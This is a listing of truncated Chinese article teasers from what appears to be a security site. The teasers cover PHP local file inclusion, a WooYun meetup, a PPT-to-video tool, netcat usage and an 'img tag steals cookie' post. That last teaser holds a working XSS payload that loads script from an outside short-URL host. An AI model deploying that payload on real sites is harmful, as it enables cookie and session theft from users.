-
php渗透测试技巧-本地文件包含
很多时候我们发现程序有本地文件包含漏洞或文件读取漏洞却不知道服务器上有什么文件或在哪个文件夹下。比如前段时间我发现某程序有个本地任意文件包含漏洞,由于目标环境设置了basedir,所以我只能包含tmp目录和web目录下的文件。 因为无...
-
10月18日乌云club线下技术交流+相亲
为了加强交流,乌云君决定在10月18日举行一次线下聚会 地点是北京朝阳区 798艺术区乌云酒吧(798剧场旁边) 感兴趣的小伙伴都可以围观,沙龙结束后会有抽奖活动(奖品绝对是是乌云特制) 议题还在征集中,议题内容发往 secdragon@...
-
PowerVideoMaker2.6(PPT转换视频神器)
在工作或学习中其他方面,我们经常会用到PPT演示文稿,在PPT中添加的一些特效、音效、视频都会用到,但有时候我们不希望它用PPT来展现,而是用视频的方式来展现。举个栗子:我把制作好的PPT希望它展现在电视上,但电视上只能插U盘播放视频,这样...
-
img 标签窃取cookie
<img src=x onerror=document.body.appendChild(createElement('script')).src='http://126.am/ia8Vp4'>o...
-
nc使用方法
1)连接到REMOTE主机,例子:格式:nc -nvv 192.168.x.x 80讲解:连到192.168.x.x的TCP80端口2)监听LOCAL主机,例子:格式:nc -l -p 80讲解:监听本机的TCP80端口3)扫描远程主机,例...
